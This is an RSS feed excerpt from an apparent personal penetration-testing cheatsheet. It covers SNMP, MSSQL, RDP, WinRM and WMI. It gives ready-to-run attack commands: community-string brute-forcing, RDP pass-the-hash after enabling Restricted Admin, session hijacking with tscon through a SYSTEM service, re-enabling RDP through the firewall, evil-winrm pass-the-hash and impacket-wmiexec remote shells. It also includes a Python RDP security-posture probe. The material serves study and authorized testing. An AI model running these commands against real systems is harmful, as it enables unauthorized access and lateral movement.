Dangerous Settings Setting Description rwuser noauth Provides access to the full OID tree without authentication. rwcommunity &lt;COMMUNITY_STRING> &lt;IPv4_ADDR> Provides access to the full OID tree regardless of where the requests were sent from. rwcommunity6 &lt;COMMUNITY_STRING> &lt;IPv6_ADDR> Same access as with rwcommunity with the difference of using IPv6. # Enum via nmap sudo nmap -n -Pn -sU -p161 -sV --script 'snmp*' --reason -oA nmap_snmp_scan &lt;TARGET> ### Brute-force names of Community Strings # - Default Strings: "public" (Read-Only) and "private" (Read/Write) are common onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt &lt;TARGET> // probably "public" ### Brute-force OIDs and info # -v 1,2c,3 snmpwalk -v &lt;VERSION> -c &lt;COMMUNITY_STRING> &lt;TARGET> .1 ### Brute-force OIDs # -2 : use v2 # braa usu. uses Version 1 braa &lt;COMMUNITY_STRING>@&lt;TARGET>:.1.* braa &lt;COMMUNITY_STRING>@&lt;TARGET>:.1.3.6.*</description></item><item><title>Win: MSSQL</title><link>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/mssql/index.html</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/mssql/index.html</guid><description>TCP/UDP 1433: normal TCP 2433: hidden mode default system schemas/databases: master - keeps the information for an instance of SQL Server. msdb - used by SQL Server Agent. model - a template database copied for each new database. resource - a read-only database that keeps system objects visible in every database on the server in sys schema. tempdb - keeps temporary objects for SQL queries. xp_cmdshell: xp_cmdshell is a powerful feature and disabled by default. It can be enabled and disabled by using the Policy-Based Management or by executing sp_configure The Windows process spawned by xp_cmdshell has the same security rights as the SQL Server service account xp_cmdshell operates synchronously. 
Control is not returned to the caller until the command-shell command is completed Microsoft’s closed-source version of SQL.</description></item><item><title>Win: RDP</title><link>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/rdp/index.html</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/rdp/index.html</guid><description>TCP 3389: normal UDP 3389: automatic w/ RDP 8.0+ for performance (frames, audio, etc.) https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/tscon Also called “Terminal Services”.
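The rdp-sec-check step in this section answers one question: which security protocols does the server accept, and is NLA enforced? The Python below is an added example written for this cheatsheet, not the page's own code and not rdp-sec-check itself; it performs that check by hand. The client sends one X.224 Connection Request per requestedProtocols value, and the server's Connection Confirm either selects a protocol (RDP_NEG_RSP), refuses with a reason (RDP_NEG_FAILURE), or carries no negotiation data at all (a pre-negotiation server that only speaks standard RDP security). All function names are this example's own; the three sample postures (NLA_ENFORCED, LEGACY_ONLY, PERMISSIVE) are built from constructed confirms, not captures, and probe() is the only function that touches a target.

```python
import socket

# requestedProtocols / selectedProtocol values (MS-RDPBCGR 2.2.1.1.1 / 2.2.1.2.1)
PROTOCOL_RDP, PROTOCOL_SSL, PROTOCOL_HYBRID = 0, 1, 2
FAILURE_CODES = {1: "SSL_REQUIRED_BY_SERVER", 2: "SSL_NOT_ALLOWED_BY_SERVER", 3: "SSL_CERT_NOT_ON_SERVER",
                 4: "INCONSISTENT_FLAGS", 5: "HYBRID_REQUIRED_BY_SERVER", 6: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER"}

def neg_struct(ntype: int, value: int) -> bytes:
    # RDP_NEG_REQ (0x01), RDP_NEG_RSP (0x02) and RDP_NEG_FAILURE (0x03) share one 8-byte layout:
    # type, flags, length = 8 (little-endian), then a 4-byte little-endian protocol mask or failure code
    return bytes([ntype, 0x00]) + (8).to_bytes(2, "little") + value.to_bytes(4, "little")

def tpkt_x224(code: int, src_ref: int, payload: bytes) -> bytes:
    # X.224 class-0 header (LI, code 0xE0 CR / 0xD0 CC, dst-ref, src-ref, class option) inside a TPKT frame
    x224 = bytes([6 + len(payload), code, 0, 0]) + src_ref.to_bytes(2, "big") + b"\x00" + payload
    return bytes([3, 0]) + (4 + len(x224)).to_bytes(2, "big") + x224

def build_x224_cr(requested_protocols: int) -> bytes:
    """Connection Request announcing which security protocols the client is willing to use."""
    return tpkt_x224(0xE0, 0, neg_struct(0x01, requested_protocols))

def parse_x224_cc(data: bytes) -> dict:
    """Classify the server's Connection Confirm: 'response' (selected_protocol), 'failure' (failure_code)
    or 'legacy' (no RDP_NEG_RSP at all: a server that predates negotiation and only does standard RDP security)."""
    if not (len(data) > 10 and data[0] == 3):
        raise ValueError("not a TPKT/X.224 packet")
    li, code = data[4], data[5]
    if code // 16 != 0x0D:
        raise ValueError("not an X.224 Connection Confirm: 0x%02x" % code)
    neg = data[11:5 + li]                          # bytes after the 6-byte fixed part of the X.224 header
    if not len(neg) > 7:
        return {"kind": "legacy"}
    ntype, flags = neg[0], neg[1]
    value = int.from_bytes(neg[4:8], "little")
    if ntype == 0x02:
        return {"kind": "response", "selected_protocol": value, "flags": flags}
    if ntype == 0x03:
        return {"kind": "failure", "failure_code": value, "reason": FAILURE_CODES.get(value, "unknown")}
    raise ValueError("unexpected negotiation structure type 0x%02x" % ntype)

def assess(confirms: dict) -> dict:
    """confirms maps requestedProtocols (0 = RDP only, 1 = SSL, 3 = SSL+HYBRID) to parsed Connection Confirms."""
    rdp, ssl, hyb = confirms[0], confirms[1], confirms[3]
    standard = rdp["kind"] == "legacy" or rdp.get("selected_protocol") == PROTOCOL_RDP
    tls = ssl.get("selected_protocol") == PROTOCOL_SSL
    nla = hyb.get("selected_protocol") == PROTOCOL_HYBRID
    return {"standard_rdp_security": standard, "tls": tls, "nla": nla,
            "nla_required": nla and not standard and not tls}

def probe(target: str, port: int = 3389, timeout: float = 3.0) -> dict:
    """Live check: one TCP connection per requestedProtocols value, the way rdp-sec-check does it."""
    confirms = {}
    for req in (PROTOCOL_RDP, PROTOCOL_SSL, PROTOCOL_SSL + PROTOCOL_HYBRID):
        with socket.create_connection((target, port), timeout=timeout) as s:
            s.sendall(build_x224_cr(req))
            confirms[req] = parse_x224_cc(s.recv(1024))
    return {**assess(confirms), "confirms": confirms}

def sample_cc(ntype: int, value: int) -> bytes:
    # Constructed Connection Confirm (not a capture from a real server)
    return tpkt_x224(0xD0, 0x1234, neg_struct(ntype, value))

LEGACY_CC = tpkt_x224(0xD0, 0x1234, b"")          # constructed: CC with no negotiation response at all
NLA_ENFORCED = {0: parse_x224_cc(sample_cc(0x03, 5)), 1: parse_x224_cc(sample_cc(0x03, 5)),
                3: parse_x224_cc(sample_cc(0x02, PROTOCOL_HYBRID))}
LEGACY_ONLY = {k: parse_x224_cc(LEGACY_CC) for k in (0, 1, 3)}
PERMISSIVE = {0: parse_x224_cc(sample_cc(0x02, PROTOCOL_RDP)), 1: parse_x224_cc(sample_cc(0x02, PROTOCOL_SSL)),
              3: parse_x224_cc(sample_cc(0x02, PROTOCOL_HYBRID))}

if __name__ == "__main__":
    import sys
    print(probe(sys.argv[1]) if len(sys.argv) > 1 else assess(NLA_ENFORCED))
```

How to read the result: standard_rdp_security True means the server still accepts the RC4-based legacy protocol with no server certificate to validate, so a man-in-the-middle can sit on the session; tls True without nla_required means the Windows login screen is reachable before any credential is checked; nla_required True (HYBRID_REQUIRED_BY_SERVER on the RDP-only and TLS-only probes) is the posture you want to see, and it is also the CredSSP path the /pth login in this section rides on.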
RDP via Pass the Hash Source: Docs > 6 - Post-Exploitation > pass-the-hash#rdp-restricted-admin-mode
RDP (Restricted Admin Mode)
https://learn.microsoft.com/en-us/windows/security/identity-protection/remote-credential-guard?tabs=intune
# Enable Restricted Admin on the target (requires local admin rights; it only applies to users who are admins there).
# With it on, the NLA/CredSSP exchange accepts the NT hash, and the session's credentials never reach the host: its outbound network logons use the machine account
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
# Now RDP with the hash
xfreerdp3 /v:&lt;TARGET> /u:&lt;USER> /pth:&lt;PASS_HASH> /cert:ignore +clipboard /dynamic-resolution /drive:/usr/share/windows-resources/mimikatz/x64,share
# Enum via nmap
sudo nmap -sV -sC --script 'rdp*' -p3389 &lt;TARGET>
# Enum RDP security posture: which security protocols (standard RDP / TLS / NLA) the server accepts and whether NLA is enforced
sudo cpan Encoding::BER
git clone https://github.com/CiscoCXSecurity/rdp-sec-check.git &amp;&amp; cd rdp-sec-check
./rdp-sec-check.pl &lt;TARGET>
# Connect to RDP, mounting mimikatz as a share plus a local loot directory for pulling files back
mkdir loot; xfreerdp3 +multitransport /clipboard /dynamic-resolution /cert:ignore /v:&lt;TARGET> /u:&lt;USER> /p:'&lt;PASSWORD>' /drive:'/usr/share/windows-resources/mimikatz/x64',share /drive:"$HOME/loot",loot
# Impersonate (hijack) another logged-in user's session without knowing their password
# NOTE: tscon without /password needs SYSTEM; /dest: is your own current session name from "query user" (e.g. console or rdp-tcp#0)
query.exe user
tscon.exe &lt;SESSION_ID> /dest:&lt;SESSION_NAME>
# Local Admin => SYSTEM: run tscon from a service, since services start as SYSTEM
sc.exe create sessionhijack binpath= "cmd.exe /k tscon.exe &lt;SESSION_ID> /dest:&lt;SESSION_NAME>"
net.exe start sessionhijack
# Enable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes</description></item><item><title>Win: WinRM</title><link>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/winrm/index.html</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/winrm/index.html</guid><description>TCP 5985/5986: via HTTP/HTTPS respectively
# Enum via nmap
sudo nmap --disable-arp-ping -n -Pn -sV -sC -p5985,5986 &lt;TARGET>
https://github.com/Hackplayers/evil-winrm
evil-winrm -u &lt;USER> -p &lt;PASSWORD> -i &lt;HOST>
evil-winrm -u &lt;USER> -H &lt;PASS_HASH> -i &lt;HOST>    # Pass the Hash (NTLM auth over WinRM)
PowerShell Remoting (Enter-PSSession / Invoke-Command from a Windows host) authenticates with the current logon session's credentials, so from an attacker-controlled session it requires a valid Kerberos ticket for the target (Pass the Ticket) or an NTLM hash injected into that session (Pass the Hash).
Ports: TCP/5985 (HTTP), TCP/5986 (HTTPS)
Requirements</description></item><item><title>Win: WMI</title><link>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/wmi/index.html</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://www.opensourcekyle.com/cyber/docs/4---vuln-analysis/wmi/index.html</guid><description>TCP 135: contacted first (RPC endpoint mapper, DCOM initialization)
TCP &lt;RHP>: a random high port (dynamic range 49152-65535 on modern Windows) handed out via 135 carries the actual WMI/DCOM traffic afterwards, so a firewall must allow it as well
# Run interactive shell (semi-interactive: each command is launched through Win32_Process.Create and its output is read back over SMB)
impacket-wmiexec &lt;USER>:"&lt;PASSWORD>"@&lt;TARGET>
# Run remote command
impacket-wmiexec &lt;USER>:"&lt;PASSWORD>"@&lt;TARGET> "&lt;COMMAND>"</description></item></channel></rss>